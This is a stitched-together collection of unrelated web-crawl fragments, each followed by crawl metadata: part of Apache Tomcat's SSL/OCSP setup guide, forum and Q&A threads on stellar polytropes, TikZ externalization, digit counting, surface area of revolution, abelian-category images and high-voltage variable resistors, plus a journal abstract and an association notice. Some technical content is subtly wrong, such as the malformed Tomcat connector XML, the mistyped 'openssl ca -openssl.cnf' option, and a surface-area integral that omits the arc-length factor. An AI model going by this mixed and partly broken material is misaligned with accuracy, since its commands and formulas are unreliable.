#### Generating OCSP-Enabled Certificates
Apache Tomcat requires the OCSP-enabled certificate to have the OCSP responder location encoded in the certificate. The basic OCSP-related certificate authority settings in the openssl.cnf file could look as follows:
#... omitted for brevity
[x509]
x509_extensions = v3_issued
[v3_issued]
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid,issuer
authorityInfoAccess = OCSP;URI:http://127.0.0.1:8088
keyUsage = critical,digitalSignature,nonRepudiation,keyEncipherment,dataEncipherment,keyAgreement,keyCertSign,cRLSign,encipherOnly,decipherOnly
basicConstraints=critical,CA:FALSE
nsComment="Testing OCSP Certificate"
#... omitted for brevity
The settings above encode the OCSP responder address 127.0.0.1:8088 into the certificate. Note that for the following steps, you must have openssl.cnf and other configuration of your CA ready. To generate an OCSP-enabled certificate:
• Create a private key:
openssl genrsa -aes256 -out ocsp-cert.key 4096
• Create a signing request (CSR):
openssl req -config openssl.cnf -new -sha256 \
-key ocsp-cert.key -out ocsp-cert.csr
• Sign the CSR:
openssl ca -openssl.cnf -extensions ocsp -days 375 -notext \
-md sha256 -in ocsp-cert.csr -out ocsp-cert.crt
• You may verify the certificate:
openssl x509 -noout -text -in ocsp-cert.crt
#### Configuring OCSP Connector
To configure the OCSP connector, first verify that you are loading the Tomcat APR library. Check the Apache Portable Runtime (APR) based Native library for Tomcat for more information about installation of APR. A basic OCSP-enabled connector definition in the server.xml file looks as follows:
<Connector
port="8443"
protocol="org.apache.coyote.http11.Http11AprProtocol"
secure="true"
scheme="https"
SSLEnabled="true"
<SSLHostConfig
caCertificateFile="/path/to/ca.pem"
certificateVerification="require"
certificateVerificationDepth="10" >
<Certificate
certificateFile="/path/to/ocsp-cert.crt"
certificateKeyFile="/path/to/ocsp-cert.key" />
</SSLHostConfig>
#### Starting OCSP Responder
Apache Tomcat will query an OCSP responder server to get the certificate status. When testing, an easy way to create an OCSP responder is by executing the following:
openssl ocsp -port 127.0.0.1:8088 \
-text -sha256 -index index.txt \
-CA ca-chain.cert.pem -rkey ocsp-cert.key \
-rsigner ocsp-cert.crt
Do note that when using OCSP, the responder encoded in the connector certificate must be running. For further information, see OCSP documentation .
### Troubleshooting
Here is a list of common problems that you may encounter when setting up SSL communications, and what to do about them.
• When Tomcat starts up, I get an exception like "java.io.FileNotFoundException: {some-directory}/{some-file} not found".
A likely explanation is that Tomcat cannot find the keystore file where it is looking. By default, Tomcat expects the keystore file to be named .keystore in the user home directory under which Tomcat is running (which may or may not be the same as yours :-). If the keystore file is anywhere else, you will need to add a keystoreFile attribute to the <Connector> element in the Tomcat configuration file.
• When Tomcat starts up, I get an exception like "java.io.FileNotFoundException: Keystore was tampered with, or password was incorrect".
Assuming that someone has not actually tampered with your keystore file, the most likely cause is that Tomcat is using a different password than the one you used when you created the keystore file. To fix this, you can either go back and recreate the keystore file, or you can add or update the keystorePass attribute on the <Connector> element in the Tomcat configuration file. REMINDER - Passwords are case sensitive!
• When Tomcat starts up, I get an exception like "java.net.SocketException: SSL handshake error javax.net.ssl.SSLException: No available certificate or key corresponds to the SSL cipher suites which are enabled."
A likely explanation is that Tomcat cannot find the alias for the server key within the specified keystore. Check that the correct keystoreFile and keyAlias are specified in the <Connector> element in the Tomcat configuration file. REMINDER - keyAlias values may be case sensitive!
• My Java-based client aborts handshakes with exceptions such as "java.lang.RuntimeException: Could not generate DH keypair" and "java.security.InvalidAlgorithmParameterException: Prime size must be multiple of 64, and can only range from 512 to 1024 (inclusive)"
If you are using the APR/native connector or the JSSE OpenSSL implementation, it will determine the strength of ephemeral DH keys from the key size of your RSA certificate. For example a 2048 bit RSA key will result in using a 2048 bit prime for the DH keys. Unfortunately Java 6 only supports 768 bit and Java 7 only supports 1024 bit. So if your certificate has a stronger key, old Java clients might produce such handshake failures. As a mitigation you can either try to force them to use another cipher by configuring an appropriate SSLCipherSuite and activate SSLHonorCipherOrder, or embed weak DH params in your certificate file. The latter approach is not recommended because it weakens the SSL security (logjam attack).
If you are still having problems, a good source of information is the TOMCAT-USER mailing list. You can find pointers to archives of previous messages on this list, as well as subscription and unsubscription information, at https://tomcat.apache.org/lists.html.
### Using the SSL for session tracking in your application
This is a new feature in the Servlet 3.0 specification. Because it uses the SSL session ID associated with the physical client-server connection there are some limitations. They are:
• Tomcat must have a connector with the attribute isSecure set to true.
• If SSL connections are managed by a proxy or a hardware accelerator they must populate the SSL request headers (see the SSLValve) so that the SSL session ID is visible to Tomcat.
• If Tomcat terminates the SSL connection, it will not be possible to use session replication as the SSL session IDs will be different on each node.
To enable SSL session tracking you need to use a context listener to set the tracking mode for the context to be just SSL (if any other tracking mode is enabled, it will be used in preference). It might look something like:
package org.apache.tomcat.example;
import java.util.EnumSet;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.SessionTrackingMode;
public class SessionTrackingModeListener implements ServletContextListener {
@Override
public void contextDestroyed(ServletContextEvent event) {
// Do nothing
}
@Override
public void contextInitialized(ServletContextEvent event) {
ServletContext context = event.getServletContext();
EnumSet<SessionTrackingMode> modes =
EnumSet.of(SessionTrackingMode.SSL);
context.setSessionTrackingModes(modes);
}
}
Note: SSL session tracking is implemented for the NIO and NIO2 connectors. It is not yet implemented for the APR connector.
### Miscellaneous Tips and Bits
To access the SSL session ID from the request, use:
String sslID = (String)request.getAttribute("javax.servlet.request.ssl_session_id");
To terminate an SSL session, use:
// Standard HTTP session invalidation
session.invalidate();
// Invalidate the SSL Session
org.apache.tomcat.util.net.SSLSessionManager mgr =
(org.apache.tomcat.util.net.SSLSessionManager)
request.getAttribute("javax.servlet.request.ssl_session_mgr");
mgr.invalidateSession();
// Close the connection since the SSL session will be active until the connection
// is closed
response.setHeader("Connection", "close");
Note that this code is Tomcat specific due to the use of the SSLSessionManager class. This is currently only available for the NIO and NIO2 connectors, not the APR/native connector. | 2021-09-26 09:29:21 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5253374576568604, "perplexity": 10098.453314502656}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057857.27/warc/CC-MAIN-20210926083818-20210926113818-00086.warc.gz"} |
https://www.physicsforums.com/threads/poisson-and-continuity-equation-for-collapsing-polytropes.627733/ | # Poisson and continuity equation for collapsing polytropes
1. Aug 12, 2012
### AmenoParallax
Hello everybody!
I am using in my studies this beautiful book by Kippenhahn & Weigert, "Stellar Structure and Evolution", but I have some problems about collapsing polytropes (chapter 19.11)...
After defining dimensionless lenght-scale z by:
$r=a(t)z$
and a velocity potential $\psi$:
$\frac{\partial r}{\partial t}=v_r=\frac{\partial \psi}{\partial r}$
the authors rewrite the Poisson equation:
$\frac{1}{z^2}\frac{\partial}{\partial z}(z^2\frac{\partial \psi}{\partial z})=4\pi G\rho a^2$
but I think there should be the gravitational potential $\phi$ instead of $\psi$, in fact performing a simple dimensional analysis shows that the left hand side is a square lenght over time, while the right hand side is a square lenght over square time, so I think the equation is wrong... Am I right? Did I miss something?
Ok, i got through it, and there is a mistake, indeed. The function in the differential equation is $\Phi$, the gravitational potential, and not the velocity potential $\psi$... I found the correct formula... in the following page | 2017-08-21 13:51:41 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8934285640716553, "perplexity": 701.7962682453754}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886108709.89/warc/CC-MAIN-20170821133645-20170821153645-00223.warc.gz"} |
https://tex.stackexchange.com/questions/211861/tikz-externalized-figures-render-incorrectly-when-eso-pic-is-used | # TikZ externalized figures render incorrectly when eso-pic is used
I am having some trouble using eso-pic in conjunction with externalised tikz figures. Content added to other document pages using \AddToShipoutPicture*{} is drawn on the TikZ figure. This does not occur when the TikZ figures are compiled in-line.
The following is a minimum working example that results in this error (compile using pdflatex --shell-escape --write18 test.tex)
\documentclass{article}
\usepackage{eso-pic}
\usepackage{pgfplots}
\usepackage{tikz}
\usetikzlibrary{external}
\pgfrealjobname{test}
\tikzexternalize
\tikzset{external/system call={pdflatex \tikzexternalcheckshellescape -halt-on-error -interaction=batchmode -jobname "\image" "\texsource"}}
\begin{document}
\AddToShipoutPicture*{\put(0,480){\rule{\paperwidth}{2cm}}}
\vfil\null
\newpage
\begin{figure}[h]
\centering
\begin{tikzpicture}[scale=1.5]
\begin{axis}[xmin=0,xmax=5,ymin=0,ymax=3]
\draw [ultra thick,gray] (axis cs:0.5,0.5) to[out=80,in=200] (axis cs:1.5,2);
\end{axis}
\end{tikzpicture}
\end{figure}
\end{document}
It appears that the shipout is not cleared when the TikZ externalise command is executed. Does anyone know how I could clear this in order to render the figures correctly?
## 1 Answer
Ok, I figured out that you can remove the externalized eso-pic calls to \AddToShipoutPicture by adding the option \tikzset{external/optimize command away=\AddToShipoutPicture} to the preamble. This seems to generate figures correctly now, without the eso-pic shipout contents. | 2019-10-16 05:19:11 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9885912537574768, "perplexity": 13615.035938412831}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986664662.15/warc/CC-MAIN-20191016041344-20191016064844-00021.warc.gz"} |
http://aamt.edu.au/About-AAMT/Constitution/AGM | Featured resource
Playing with Place Value
Place value may seem a simple concept but it can be very difficult to teach successfully. There are many materials available to use in the classroom, but which ones work? When should they be used? Respected educator, Paul Swan, presents well-researched approaches which will help you to teach, and your students to learn, place value.
Members: $22.00 inc.GST Others:$ 27.50 inc.GST
Annual General Meeting
The AGM for the 2015 Financial Year was held in Canberra on 30 April 2016. Jurek Paradowski was elected Treasurer for the period to the AGM in 2018. Allason McNamara assumed the role of President, also until the AGM in 2018, with Mary Coupland stepping down as President to take up her role as Immediate Past President until the AGM in 2017.
The meeting received the Annual Report and passed a motion to change the Constitution, the result of which is a decrease in the number of the Association's Objectives. | 2017-02-19 23:17:20 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2712079882621765, "perplexity": 2793.703058398288}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170286.6/warc/CC-MAIN-20170219104610-00442-ip-10-171-10-108.ec2.internal.warc.gz"} |
https://math.stackexchange.com/questions/3157716/how-many-4-digit-numbers-are-there-where-any-two-consecutive-digits-are-differen | How many 4-digit numbers are there where any two consecutive digits are different?
How many 4-digit numbers are there where any two consecutive digits are different?
I know that there are $$\binom{9}{1}$$ ways to choose the first digit(from the left), and I think there are $$\binom{10}{1}$$ ways to choose the second, and third digit, and $$\binom{9}{1}$$ ways to choose the fourth digit since 2 digits must consecutive are different. I don't think I am going about this the right way though because if you multiply $$\binom{10}{1}*\binom{10}{1}*\binom{9}{1}*\binom{9}{1}$$ which seems way too big. Can someone help me go about this?
• 9 choices for each digit...think about why – Don Thousand Mar 22 at 3:50
• It's more usual to write $\binom 91$ as $9$, etc. – Lord Shark the Unknown Mar 22 at 4:02
In fact, by my reckoning there must be $${9 \choose 1}^4$$ ways form 4 digit numbers with not two consecutive digits. | 2019-08-25 00:37:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 5, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8475948572158813, "perplexity": 199.62407298069294}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027322160.92/warc/CC-MAIN-20190825000550-20190825022550-00429.warc.gz"} |
http://mathhelpforum.com/calculus/218269-surface-area-curve-about-y-axis-print.html | # Surface area of a curve about the y axis
• April 27th 2013, 05:26 AM
OldMate
Surface area of a curve about the y axis
the equation is https://fastres01.qut.edu.au/webwork...0c96109db1.png. I found that x=sqrt(1-y) and that x'=-1/(2*sqrt(y-1)).
I've been using integral(2*pi*x*sqrt(1+x'^2)) but i keep just getting mixed up with my calculations.
help would be appreciated.
• April 27th 2013, 05:45 AM
Prove It
Re: Surface area of a curve about the y axis
If you rotate this function about the y-axis, each cross-section parallel to the x-axis will be a circle. The circumference of each circle is \displaystyle \begin{align*} 2\pi r = 2\pi x = 2\pi \, \sqrt{ 1 - y } \end{align*}, and if you add up all these circumferences over \displaystyle \begin{align*} 0 \leq y \leq 1 \end{align*} then you will get the total surface area. So
\displaystyle \begin{align*} SA &= \int_0^1{2\pi \, \sqrt{ 1 - y} \, dy} \end{align*}
• April 27th 2013, 06:39 PM
OldMate
Re: Surface area of a curve about the y axis
so i used that equation and my end result was (4pi)/3, but its apparently incorrect. did i do something wrong?
• April 27th 2013, 07:08 PM
Prove It
Re: Surface area of a curve about the y axis | 2016-05-05 01:19:41 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 3, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9988822340965271, "perplexity": 1268.7313091865701}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-18/segments/1461860125750.3/warc/CC-MAIN-20160428161525-00045-ip-10-239-7-51.ec2.internal.warc.gz"} |
https://msp.org/ant/2022/16-5/ant-v16-n5-p04-p.pdf | #### Vol. 16, No. 5, 2022
Recent Issues
The Journal About the Journal Editorial Board Editors’ Interests Subscriptions Submission Guidelines Submission Form Policies for Authors Ethics Statement ISSN: 1944-7833 (e-only) ISSN: 1937-0652 (print) Author Index To Appear Other MSP Journals
Resolution of ideals associated to subspace arrangements
### Aldo Conca and Manolis C. Tsakiris
Vol. 16 (2022), No. 5, 1121–1140
##### Abstract
Let ${I}_{1},\dots ,{I}_{n}$ be ideals generated by linear forms in a polynomial ring over an infinite field and let $J={I}_{1}\cdots {I}_{n}$. We describe a minimal free resolution of $J$ and show that it is supported on a polymatroid obtained from the underlying representable polymatroid by means of the so-called Dilworth truncation. Formulas for the projective dimension and Betti numbers are given in terms of the polymatroid as well as a characterization of the associated primes. Along the way we show that $J$ has linear quotients. In fact, we do this for a large class of ideals ${J}_{P}$, where $P$ is a certain poset ideal associated to the underlying subspace arrangement.
We have not been able to recognize your IP address 3.226.122.122 as that of a subscriber to this journal.
Online access to the content of recent issues is by subscription, or purchase of single articles.
or by using our contact form.
##### Keywords
subspace arrangements, free resolutions
Primary: 13D02
##### Milestones
Revised: 8 April 2021
Accepted: 24 July 2021
Published: 16 August 2022
##### Authors
Aldo Conca Dipartimento di Matematica Università di Genova Genova Italy Manolis C. Tsakiris Dipartimento di Matematica Università di Genova Genova Italy Academy of Mathematics and Systems Science Chinese Academy of Sciences Beijing China | 2023-04-01 20:35:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 6, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24069470167160034, "perplexity": 1382.5140874751598}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950247.65/warc/CC-MAIN-20230401191131-20230401221131-00101.warc.gz"} |
https://math.stackexchange.com/questions/1885954/image-as-kernel-of-cokernel-and-epimorphism-in-category-theory | # Image as kernel of cokernel and epimorphism in category theory
I am studying Vakil's notes, Section 1.6.3, on the concept of abelian categories.
A kernel of a morphism $f: B\rightarrow C$ is a map $i: A\rightarrow B$ such that $f\circ i=0$, and that is universal with respect to this property. Diagramatically:
A cokernel is defined dually by reversing the arrows.
The image of a morphism $f: A\rightarrow B$ is defined as $\text{im}(f)=\ker(\text{coker (f)})$.
It is mentioned as a fact that
For a morphism $f: A\rightarrow B$, $A\rightarrow \text{im}(f)$ is an epimorphism. I will show an equivalent statement: $f: A\rightarrow B$ is an epimorphism if $\text{im}(f)=B$.
Here is my effort so far to show it.
We have the following diagram:
$e: B\rightarrow C$ is the cokernel of $f$, $i: B\rightarrow B$ is the kernel of the cokernel, hence the image of $f$. To show $f$ is an epimorphism, suppose that $\phi\circ f=0$ for some $\phi: B\rightarrow D$. We need to show that $\phi=0$.
We see that $\alpha\circ e\circ i=\phi\circ i=0$. My question is, when we say $\text{im}(f)=B$, does it implicitly imply that $\text{im}(f)$ is the identity map $\text{id}_B: B\rightarrow B$? If that is true, then I have $\phi=0$. Then the proof is done. If it is not, I don't know how to continue to show $\phi=0$.
• If you edit your diagram to denote the dotted $f$ by another letter, say $g$, it becomes easy to check that the statements are equivalent in case $\text{im } f = B$ is taken to mean $i = 1_B$. So for the purposes of the proof, you're fine to take it that way. It's hard to say there's a "correct" interpretation, since the statement constitutes an abuse of notation. – Mr. Chip Aug 8 '16 at 13:31
• @Mr.Chip: Thank you for your comment. I put $f$ there since I think that map is unique, so it has to be $f$. But I see the abuse of notation there. Thanks for pointing it out. – KittyL Aug 8 '16 at 14:58 | 2019-05-20 07:23:13 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9677152633666992, "perplexity": 98.90790017850955}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232255773.51/warc/CC-MAIN-20190520061847-20190520083847-00223.warc.gz"} |
https://electronics.stackexchange.com/questions/217044/high-voltage-voltage-controlled-linear-variable-resistor | # High voltage voltage controlled linear variable resistor
I have some high voltage (300v+) analog circuits that I want to control digitally which requires the use of a voltage controlled linear resistor that can withstand the high voltages. I don't expect the current levels to be that high. I originally settled on LDR optocouplers but it turns out they can't handle big voltages so that leaves me with transistor or diode optocouplers. As far as I understand it, photodiodes are light controlled zeners and phototransistors are light controlled transistors. Which one should I choose for a high voltage linear variable resistor meant for a voltage divider? Here is an example of how I would use the variable resistor
• At least an architectural drawing would be helpful. – Peter Smith Feb 13 '16 at 17:45
• Does it actually have to be resistive or are you looking for a voltage-controlled current source? – Oleksandr R. Feb 13 '16 at 17:47
• The bottom line is a need a potentiometer. – coinmaster Feb 13 '16 at 17:56
• Normally the anode is '+' and cathode is '-'. Is there a good reason this is reversed? – Transistor Feb 13 '16 at 18:29
• Hmmm..Not sure. – coinmaster Feb 13 '16 at 18:31
The linear opto-isolator
The IL300 Linear Optocoupler may be worth examining as a means of providing linear analog coupling with isolation.
Figure 1. IL300 isolated composite amplifier. (Source: datasheet linked above.)
The IL300 consists of a high-efficiency AlGaAs LED emitter coupled to two independent PIN photodiodes. The servo photodiode (pins 3, 4) provides a feedback signal which controls the current to the LED emitter (pins 1, 2). This photodiode provides a photocurrent, $I_{P1}$, that is directly proportional to the LED’s incident flux. This servo operation linearizes the LED’s output flux and eliminates the LED’s time and temperature. The galvanic isolation between the input and the output is provided by a second PIN photodiode (pins 5, 6) located on the output side of the coupler. The output current, $I_{P2}$, from this photodiode accurately tracks the photocurrent generated by the servo photodiode.
This could be a good start to a solution.
You could have one complete Figure 1 circuit feed the control signal to the HV side and another giving feedback to the LV side, if required.
The variable resistor
Making a voltage controlled resistor to go up towards infinity presents a problem in that our DAC isn't able to output infinite control voltage. If, instead, we control conductance the problem becomes simpler. First, some definitions from Wikipedia:
The resistance (R) of an object is defined as the ratio of voltage across it (V) to current through it (I), while the conductance (G) is the inverse:
$$R = {V\over I}, \qquad G = {I\over V} = \frac{1}{R}$$
The SI unit of electrical resistance is the ohm (Ω), while electrical conductance is measured in siemens (S).
Controlling conductance makes this a little easier. A value of zero conductance (control voltage at 0 V) means infinite resistance. We can set 100% control voltage to give any chosen maximum conductance (minimum resistance). In this circuit I will set the minimum resistance to 1 kΩ (= 1 mS). So full range is 0 S to 1 mS (∞ to 1 kΩ).
simulate this circuit – Schematic created using CircuitLab
Figure 2. Programmable conductor.
• Q is the variable 'resistor'. It will be a high-power, high-voltage device.
• R1 / R2 form a voltage divider for the $V_R/100$ amplifier.
• $R_S$ (shunt) monitors the current through Q. The signal is amplified to give $-10 I_R$.
• The DIV box gain is set to give output $\frac {10k \cdot I_R}{V_R} = \frac {10k}{R}$ where R is the total resistance between V+ and V-.
• All of the above forms a negative feedback circuit for OA which is controlling the resistance of Q set as by $\frac {10k}{R} setpoint$.
• $R_{SETPOINT}$ is set by the micro-controller via the IL300 isolated composite amplifier shown in Figure 1.
So, for setpoint = 0, R = 10k / 0 = ∞. For setpoint = 10 V, R = 10k / 10 = 1k. For setpoint = 2 V, R = 10 kΩ, etc.
A separate isolate PSU is shown. This will generate a dual 15 V supply with the common floating at V- potential.
The (almost) full circuit
simulate this circuit
Figure 3. A conductance control circuit. All chips require decoupling capacitors from +Vs and -Vs to PSU common (and are not shown to reduce clutter).
The circuit is based on Analog Devices' AD633, page 10, Figure 16, "Connections for division". The AD633 is a four-quadrant multiplier but when installed in the op-amp feedback loop in this configuration it becomes a four-quadrant divider.
• The measure the effective resistance of the circuit between V+ and V- we need to monitor both the voltage and the current. The OP says voltage could be up to 600 V and currents up to 100 mA. The analog circuits will operate between -10 V and +10 V.
• R1 / R2 voltage divider is buffered by OA1 to give an output of $\frac {V_R}{100}$. This will be 6 V at maximum voltage.
• $R_{SHUNT}$ is 10 Ω, giving 1 V at 100 mA. It is buffered an inverted by OA2 giving $-10 I_R$ volts per amp. This signal is inverted to facilitate the inverting input of the divider circuit (which will cancel the inversion).
• OA3 and U1 form the divider circuit and is based directly on the application note above. OA3 virtual earth point (inverting input) will be 0 V when $W = 10 I_R$, sourcing the current being sunk by OA2. This will happen when the following equation is true:
$$10 I_R = \frac{1}{10} V_{X1}V_{Y1} = \frac{1}{10} \frac {V_R}{100} V_{OA3}$$.
Solving for the output of OA3,
$$V_{OA3} = 10k \frac {I_R}{V_R} = \frac {10k}{R}$$
Feeding this value to the inverting input of OA4 completes a feedback loop required for OA4 which drives Q1 to control the resistance of the circuit. Control is achieved by setting the required conductance on OA4's non-inverting input.
The arrangement shown in Figure 1 can be used to control the conductance circuit of Figure 3.
I have not tested either circuit. It might be worth simulation.
• I'm not seeing how that could be used as a potentiometer in series with a circuit. – coinmaster Feb 13 '16 at 18:55
• It gives you a means of controlling a transistor or FET as a variable resistor in your HV circuit. Am I correct in thinking you only want to control the 200k resistor in your other post? What's the voltage and current at max and min resistance? – Transistor Feb 13 '16 at 19:03
• Max min is probably around zero to 3 Mohms. I know of no transistor or fet that can operate linearly under those conditions. – coinmaster Feb 13 '16 at 19:10
• You'll require an amplifier with feedback to linearise the device. You didn't answer the question, "And what is the voltage and current at max and min resistance?". You really want to control the current in the whole circuit rather than resistance on the left? – Transistor Feb 13 '16 at 19:16
• The current should be almost nothing, at least for the triode load design, I'm not sure about the variable zener design, my circuit analysis skills are still in development. Voltage range is -300v to +600v. – coinmaster Feb 13 '16 at 19:21
Replace VR1 with 50kohm fixed, and use the LDR for R2 -- it only has 0.6 V across it.
• Not when I'm using it for a 600v supply. – coinmaster Feb 13 '16 at 19:48
• Your circuit doesn't have 600 V across it -- at most about 7 V if cathode > anode. You may have 600 V between the circuit and GND, but not across the components themselves (else you'd have 16 W in R1). If you don't understand this, I suggest you stop before your lack of understanding of high voltages kills you. – jp314 Feb 13 '16 at 21:52
• LTSpice disagrees. Also the method you stated limits how far down I can drag the voltage. – coinmaster Feb 13 '16 at 22:07
